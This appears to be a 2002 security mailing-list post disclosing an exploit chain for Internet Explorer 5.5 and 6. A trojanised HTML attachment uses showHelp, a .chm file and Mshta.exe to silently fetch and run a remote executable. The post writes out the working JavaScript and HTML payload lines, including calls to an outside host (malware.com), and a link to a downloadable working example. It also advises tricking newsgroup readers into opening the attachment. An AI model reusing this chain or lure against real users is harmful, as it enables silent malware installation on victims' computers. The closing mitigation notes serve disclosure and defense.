HELP ! : Trojanised HTML: Internet Exporer 5 and 6 [technical exercise]

["http-equiv () malware com" <http-equiv () malware com>]

Thursday, February 7, 2002

Default installation of Internet Explorer 5.5 and 6.0 still allows us 
to execute files on default installations of the target computer, 
technically trivial silent delivery and installation of an executable 
on the target computer.:

We cobble together new and old Components as follows : -

1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1033)
2. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/2456)
3. Mshta.exe http://www.malware.com/foobar.hta

The manufacturer has done a really tremendous job of tightening down 
any possibility to effect either 1 or 2 above. Nothing can be 
activated through the Temporary Internet Files unless full path names 
are known for both showHelp calling and Click() of our link. 
Previously it was possible as long as all components were in the same 
directory and only file names known.

Nevertheless:

We are able to retrieve from the Temporary Internet File our 
trojanised html, determine the location of it, write this location 
out to our showHelp call and thereafter execute our remote link.

What?

We create a very simple *.html file like so:

 <bgsound src="http://www.malware.com/malware.chm";>

this will pull our *.chm into the Temporary Internet File

when then include the Guninski scripting to determine the location of 
our *.html file like so:

malware=document.URL;
path=malware.substr(-0,malware.lastIndexOf("\\"));
path=unescape(path);

we then take that location information and write it to a simple html 
form like so:

document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden"  size="40" maxlength="80"
value="'+path+'\\malware[1].chm"></form>');

technical note: it seems the myriad of patching to date does not make 
it possible to pass the location directly to the showHelp call. It 
must be written to the form which can then be automatically submitted:

setTimeout('document.malware.submit()',5000);

before we do all that we create our very simple malware.chm and 
include our link object like so:

C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta

this is particularly interesting as we are able to pass a link to the
mshta.exe, which in turn will open from the remote site our *.hta 
which includes our executable. All without warning.

technical note: the possibility is excellent to repeat the entire 
process above directly inside the *.chm file and drop an *.exe from 
within the *.chm into the same Temporary Internet File. Using our 
Guninski scripting to determine the location of the *.chm and write 
that to the link parameter within it: value="'+path+'\\malware
[1].exe"> and execute it.

So what happens?

We construct our trojanised *.html file and send it off to our target
computer. This can be via mail or news. The recipient receives the 
mail message and attached *.html file. We then convince our 
unsuspecting recipient to open our *.html. This should be quite 
trivial, particularly in news as the attached file is in fact nothing 
more than a 500 byte html file.

Consider the following scenario in your favourite web design news 
group:

Carefully note: there is a hardened security warning when attempting 
to open attached *.html file. However our combination call for 
assistance coupled with nothing more than a legitimate *.html file 
should prove more than tempting:

(screen shot: http://www.malware.com/duh.png 18KB)

Why does it happen?

Because our simple *.html file is an attachment, security has it 
transfer to the Internet Temporary File for opening, under the 
security browser's settings. However, precisely because it is 
physically opened within the TIF, we can use our Guninski scripting 
to determine the exact location, write that exact location to our 
form and call our *.chm where it too resides.

Working Example: (includes harmless *.exe -- the *.chm is hardcoded 
for win98)

[note: due to pathetic technical reasons our *.chm is off-site and 
may delay in transferring to the TIF and could possibly fail]

nb: working example must be attached to mail or news

http://www.malware.com/help!.zip

Notes:

1. Be aware of "innocent" *.html files in mail and news
2. Disable Active Scripting and Active X controls
3. Disable the HHCtrl ActiveX control
[see:http://www.kb.cert.org/vuls/id/25249 ]
4. Disable or Remove Mshta.exe [although if an *.exe embedded 
directly into the *.chm then this has no impact]
5. None.

Critical Note: we are seeking a competent fast hosting service, that 
can maintain exotic mime types on the server (including all windows 
media files, *.chm files, *.mhtml files etc], we cannot demonstrate 
when slob services cannot maintain the correct mime types on the 
server, and files parse as text regardless of what they are. We don't 
require much, +/-25MB space, handful of email addresses, must have 
PHP, server should be fast and stable. Not much bandwidth required, 
only +/-1.2 million hits since June 2002. Contact sinkhole @ 
malware.com


end call

-- 
http://www.malware.com